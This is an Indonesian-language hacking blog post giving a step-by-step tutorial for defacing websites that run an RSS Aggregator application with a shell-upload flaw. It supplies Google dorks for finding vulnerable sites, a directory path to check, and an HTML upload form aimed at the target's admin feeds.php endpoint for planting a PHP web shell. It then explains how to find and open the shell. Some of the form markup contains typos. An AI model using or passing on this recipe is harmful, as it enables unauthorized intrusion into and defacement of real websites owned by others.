Assallamuallaikum ^_^
Ketemu Maning Sama Mr.GladiatorX207 :D
sudah lama ya , gak share tentang cara deface :v
kali ini saya akan share Cara Deface Exploit Rss Aggregator Shell Upload Vuln
ok , langsung aja :D
Dork : inurl:"/feed-sources"
inurl:/top-hit-item"
( dork bisa dikembangkan )
cari target dengan dork tersebut , nah kalau sudah dapat , tambahkan exploit berikut
/upload/feeds_logos/
contoh : www.situs-target.com/upload/feeds_logos/
nanti kalau keluar directornya , berarti web itu vuln
nah , sekarang buka notepad , kemudian copy paste kode berikut , dan simpan dengan format .html
<html>
<title>Mr.GladiatorX207 | Killer Security</title>
<center>
# dork : inurl:"/feed-sources" inurl:"/top-hits-item"<br>
# exploit : test exploit -->/uploads/feeds_logos/<br><br>
<form action="http:situs-target.com/admin/feeds.php?do=edit&id=1" method="post" enctype="multipart/from-data">
<label for="file">file : </label>
<input type="file" name="file" id="file"><br>
<input type="sumbit" name="sumbit" value="sumbit">
</form>
tulisan berwarna merah , silakan ganti dengan target yang sudah kalian dapat
kalau sudah , save dengan format .html , dan buka dengab browser
kemudian akan muncul tempat upload , dan upload shell kalian
biasanya , setelah selesai mengupload akan langsung di redict ke halaman login adminnya , nah tinggal cari deh lokasi shell kalian :D
Ohh iya , nanti nama shell kalian acak acakan lohh >_<
tapi , gampang kok kalau mau manggil shell , tinggal cek directorynya
contoh : www.situs-target.com/upload/feeds_logos/
nanti akan muncul file , cari saja file yang ekstentikan .php
kemudian klik :D
nah , kalo shell sudah muncul , terserah deh mau diapain :D
ok , sekian toturial dari saya :D
kalau masih bingung silakan berkomentar dibawah :D
0 komentar:
Posting Komentar